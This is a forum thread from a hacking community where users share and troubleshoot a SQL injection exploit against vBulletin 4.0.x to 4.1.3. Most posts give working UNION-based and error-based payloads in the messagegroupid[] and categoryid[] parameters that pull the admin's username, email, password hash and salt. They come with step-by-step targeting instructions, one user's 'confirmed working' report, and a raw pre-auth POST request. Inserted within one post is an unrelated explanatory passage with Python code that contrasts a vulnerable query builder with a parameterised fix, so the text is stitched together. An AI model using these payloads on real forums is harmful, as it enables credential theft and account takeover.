
Thread: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

  1. #11
    Not working.

    Used the following term in Live HTTP Headers:
    Code:
    query=Hi+there%2C+any+updates+yet&titleonly=0&searchuser=&starteronly=1&dosearch=Search+Now&messagegroupid%5B%5D=32&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=0&saveprefs=1&s=&securitytoken=1311260620-ba7281604a43c53db361e6069a46b4d9dcc14a18&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
    But got this:
    Code:
    vBulletin Message:
    Sorry - no matches. Please try some different terms.

  2. #12
    Security Researcher fb1h2s
    I didn't really want to put up a step-by-step exploitation tutorial. Well, yeah, the bug is kind of tricky to exploit. You need to do a little groundwork to get it done. Maybe by tomorrow I will put up a better description of the vulnerability.

    @eugenius I found success only post-authentication.

    Quick Points though:

    1) The forum must have Groups and Discussions.
    http://www.garage4hackers.com/group.php

    2) You should note down a group id and a discussion message.

    http://www.garage4hackers.com/group.php?groupid=16

    3) Now search by Group Message at http://www.garage4hackers.com/search.php, using the valid discussion message as the search keyword, then add this extra POST field and it would be woot woot.

    &messagegroupid[0]=groupid]) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
    Hacking Is a Matter of Time Knowledge and Patience
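The three steps above boil down to one thing: a `messagegroupid[]` array value that is supposed to be an integer reaches an `IN (...)` clause of the search query without being cast, so closing the parenthesis and appending `UNION SELECT ... FROM user` returns user rows through the result set. The script below is an added example, not vBulletin's code and not something from this thread; the table names, rows and query builder are a constructed model of that pattern (the real vBulletin search code, its result rendering, and the reason a matching keyword is needed are not reproduced). It runs against in-memory SQLite, so the payload uses `||` and `--` where the MySQL payload in the thread uses `concat()` and `#`. It puts the vulnerable builder next to a hardened one that casts every id to an integer and binds it as a parameter.

```python
"""Model of the messagegroupid[] injection and its fix.

Constructed for this example: the schema, the rows and both query builders.
They imitate an integer-array search filter interpolated into IN (...);
they are not vBulletin's code. SQLite syntax is used ('||' for concat,
'--' for the trailing comment) where MySQL would use concat() and '#'.
"""
import sqlite3

SCHEMA = """
CREATE TABLE socialgroupmessage (gmid INTEGER, groupid INTEGER, pagetext TEXT);
CREATE TABLE user (userid INTEGER, username TEXT, email TEXT,
                   password TEXT, salt TEXT);
INSERT INTO socialgroupmessage VALUES (1, 16, 'testingtesting');
INSERT INTO socialgroupmessage VALUES (2, 17, 'unrelated discussion');
INSERT INTO user VALUES (1, 'admin', 'admin@example.invalid',
                         '5f4dcc3b5aa765d61d8327deb882cf99', 'Ab3');
"""

# Same shape as the thread's payload: a valid group id closes the IN (...)
# list, a one-column UNION pulls from `user`, and a comment eats the rest.
PAYLOAD = ("16) UNION SELECT username||':'||email||':'||password||':'||salt "
           "FROM user WHERE userid=1 --")


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, keyword, messagegroupid):
    """The keyword is bound, but the group ids are joined straight into the SQL."""
    group_list = ", ".join(str(g) for g in messagegroupid)
    sql = ("SELECT pagetext FROM socialgroupmessage "
           "WHERE pagetext LIKE ? AND groupid IN (" + group_list + ")")
    return [row[0] for row in conn.execute(sql, ("%" + keyword + "%",))]


def search_hardened(conn, keyword, messagegroupid):
    """Every id must be an integer, and each one is bound as a parameter."""
    try:
        ids = [int(g) for g in messagegroupid]
    except (TypeError, ValueError):
        raise ValueError("messagegroupid[] must contain integers only")
    placeholders = ", ".join("?" for _ in ids)
    sql = ("SELECT pagetext FROM socialgroupmessage "
           "WHERE pagetext LIKE ? AND groupid IN (" + placeholders + ")")
    return [row[0] for row in conn.execute(sql, ["%" + keyword + "%", *ids])]


def demo():
    """Run the payload through both builders and report what each one does."""
    conn = open_db()
    leaked = search_vulnerable(conn, "testingtesting", [PAYLOAD])
    try:
        search_hardened(conn, "testingtesting", [PAYLOAD])
        rejected = False
    except ValueError:
        rejected = True
    return {
        "vulnerable": leaked,                      # message row plus the user row
        "hardened_rejected": rejected,             # payload never reaches SQL
        "hardened_legit": search_hardened(conn, "testingtesting", ["16"]),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The hardened builder does two things, and both matter: `int()` rejects anything that is not a whole number before any SQL is built, and the surviving ids are bound as `?` parameters so the list length, not the list content, shapes the query. Casting alone would be enough against this payload, but binding also covers the case where the cast is later loosened or forgotten.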

  3. #13
    Quote Originally Posted by fb1h2s
    I didn't really want to put up a step-by-step exploitation tutorial. Well, yeah, the bug is kind of tricky to exploit. You need to do a little groundwork to get it done. Maybe by tomorrow I will put up a better description of the vulnerability.

    @eugenius I found success only post-authentication.

    Quick Points though:

    1) The forum must have Groups and Discussions.
    http://www.garage4hackers.com/group.php

    2) You should note down a group id and a discussion message.

    http://www.garage4hackers.com/group.php?groupid=16

    3) Now search by Group Message at http://www.garage4hackers.com/search.php, using the valid discussion message as the search keyword, then add this extra POST field and it would be woot woot.

    &messagegroupid[0]=groupid]) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#
    Confirmed working.

  4. #14
    Still a little confused, can someone post an example search?

  5. #15
    For pre-auth try this. I don't have a request for the post-auth one. I copied this from the site I posted earlier.

    POST /search.php?do=process HTTP/1.1
    Host: 127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

  6. #16
    It just seems to do a regular search.

    WTF is happening?

  7. #17
    Hi!
    Here's what I get, but there must be an error.

    1 - Once you find out the target forum has groups, go to groups.php and take a group ID.
    2 - Open the group, find a discussion, click it and copy a message.
    3 - Go to search.php and click "Search Single Content Type", selecting "Group Messages" as the "Search Type", then paste the copied discussion message into "Keyword(s):". Add to that field ("Keyword(s)") a string like

    &messagegroupid[0]=YOUR_GROUP_ID]) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

    and press Enter.

    This does not work, and it follows your instructions.
    Can someone correct it?

  8. #18
    Quote Originally Posted by manucuvia
    Hi!
    Here's what I get, but there must be an error.
    Error: http://i005.radikal.ru/1107/88/96c46c38b331.png

  9. #19
    Security Researcher fb1h2s
    @vkbugs messagegroupid[0]= valid group id, the id of the group where you have the text "testingtesting".

    Remember it's a UNION attack, so you need to make a search that gets a valid output.
    Hacking Is a Matter of Time Knowledge and Patience

  10. #20


    Quote Originally Posted by fb1h2s
    @vkbugs messagegroupid[0]= valid group id
    Thanks.
